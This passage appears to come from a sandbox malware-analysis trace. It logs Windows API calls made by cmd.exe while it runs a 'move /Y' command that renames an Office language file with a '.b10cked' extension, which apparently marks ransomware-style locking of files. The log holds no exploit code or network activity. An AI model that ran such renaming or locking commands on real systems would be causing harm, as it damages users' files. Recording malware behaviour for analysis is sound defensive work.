RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0167.088] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.088] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.088] GetConsoleOutputCP () returned 0x1b5 [0167.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0167.088] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0167.088] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.089] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0167.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0167.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.107] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0167.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.108] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0167.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.108] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0167.108] GetEnvironmentStringsW () returned 0x3d0210* [0167.108] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0167.108] GetEnvironmentStringsW () returned 0x3d0210* [0167.109] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0167.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cead4 | out: phkResult=0x2cead4*=0x40) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0xa0, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x0, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegCloseKey (hKey=0x40) returned 0x0 [0167.109] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cead4 | out: phkResult=0x2cead4*=0x40) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x40, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x0, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.110] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x9, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.110] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x9, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.110] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x9, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.110] RegCloseKey (hKey=0x40) returned 0x0 [0167.110] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886385 [0167.110] srand (_Seed=0x5b886385) [0167.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"" [0167.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"" [0167.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.110] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0167.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0167.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0167.111] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0167.111] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0167.111] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0167.111] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0167.111] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0167.111] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0167.111] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0167.111] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0167.111] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0167.111] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0167.111] GetEnvironmentStringsW () returned 0x3d2360* [0167.111] FreeEnvironmentStringsW (penv=0x3d2360) returned 1 [0167.111] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.111] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0167.111] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0167.111] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0167.111] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0167.111] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0167.111] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0167.111] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0167.111] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0167.111] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0167.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf8a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.112] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf8a0, lpFilePart=0x2cf89c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf89c*="Desktop") returned 0x18 [0167.112] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0167.112] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf61c | out: lpFindFileData=0x2cf61c) returned 0x3d09f0 [0167.112] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0167.112] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf61c | out: lpFindFileData=0x2cf61c) returned 0x3d09f0 [0167.112] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0167.112] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf61c | out: lpFindFileData=0x2cf61c) returned 0x3d09f0 [0167.112] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0167.112] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0167.112] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0167.112] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0167.112] GetEnvironmentStringsW () returned 0x3d0210* [0167.113] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0167.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.113] GetConsoleOutputCP () returned 0x1b5 [0167.113] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0167.113] GetUserDefaultLCID () returned 0x409 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf9e0, cchData=128 | out: lpLCData="0") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf9e0, cchData=128 | out: lpLCData="0") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf9e0, cchData=128 | out: lpLCData="1") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0167.114] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0167.114] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0167.115] GetConsoleTitleW (in: lpConsoleTitle=0x3c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0167.115] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0167.115] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0167.116] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0167.117] _wcsicmp (_String1="move", _String2=")") returned 68 [0167.117] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0167.117] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0167.117] _wcsicmp (_String1="IF", _String2="move") returned -4 [0167.117] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0167.117] _wcsicmp (_String1="REM", _String2="move") returned 5 [0167.117] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0167.121] GetConsoleTitleW (in: lpConsoleTitle=0x2cf6d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0167.257] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0167.257] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0167.257] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0167.257] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0167.257] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0167.257] _wcsicmp (_String1="move", _String2="CD") returned 10 [0167.257] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0167.257] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0167.257] _wcsicmp (_String1="move", _String2="REN") returned -5 [0167.257] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0167.257] _wcsicmp (_String1="move", _String2="SET") returned -6 [0167.257] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0167.257] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0167.257] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0167.257] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0167.257] _wcsicmp (_String1="move", _String2="MD") returned 11 [0167.257] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0167.257] _wcsicmp (_String1="move", _String2="RD") returned -5 [0167.258] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0167.258] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0167.258] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0167.258] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0167.258] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0167.258] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0167.258] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0167.258] _wcsicmp (_String1="move", _String2="VER") returned -9 [0167.258] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0167.258] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0167.258] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0167.258] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0167.258] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0167.258] _wcsicmp (_String1="move", _String2="START") returned -6 [0167.258] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0167.258] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0167.258] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0167.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0167.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0167.260] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf494, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf48c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf48c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0167.261] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0167.262] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0167.289] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0167.289] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0167.289] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0167.289] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~1.trx")) returned 0x2020 [0167.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0167.289] SetErrorMode (uMode=0x0) returned 0x0 [0167.289] SetErrorMode (uMode=0x1) returned 0x0 [0167.289] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2cee1c, lpFilePart=0x2cee04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", lpFilePart=0x2cee04*="GRINTL~1.TRX") returned 0x3c [0167.289] SetErrorMode (uMode=0x0) returned 0x1 [0167.289] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0167.290] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0167.290] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0167.290] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~1.trx")) returned 0x2020 [0167.290] SetErrorMode (uMode=0x0) returned 0x0 [0167.290] SetErrorMode (uMode=0x1) returned 0x0 [0167.290] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2cf298, lpFilePart=0x2cf030 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", lpFilePart=0x2cf030*="GRINTL~1.TRX") returned 0x3c [0167.290] SetErrorMode (uMode=0x0) returned 0x1 [0167.290] SetErrorMode (uMode=0x0) returned 0x0 [0167.290] SetErrorMode (uMode=0x1) returned 0x0 [0167.290] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2cf4a0, lpFilePart=0x2cf030 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x2cf030*="GRINTL32.DLL.trx_dll.b10cked") returned 0x4c [0167.290] SetErrorMode (uMode=0x0) returned 0x1 [0167.290] SetLastError (dwErrCode=0x0) [0167.290] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0167.290] GetLastError () returned 0x2 [0167.290] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ce9ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce9ac) returned 0x3d2130 [0167.291] FindNextFileW (in: hFindFile=0x3d2130, lpFindFileData=0x2ce9ac | out: lpFindFileData=0x2ce9ac) returned 0 [0167.291] GetLastError () returned 0x12 [0167.291] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0167.293] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3d1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1cc0) returned 0x3d2130 [0167.293] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2cec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0167.293] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2cec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0167.293] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll")) returned 0x2020 [0167.293] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0167.294] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0167.294] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cebf8 | out: _Buffer=" 1") returned 9 [0167.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.294] GetFileType (hFile=0x7) returned 0x2 [0167.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0167.294] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceb84 | out: lpMode=0x2ceb84) returned 1 [0167.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.294] GetConsoleScreenBufferInfo 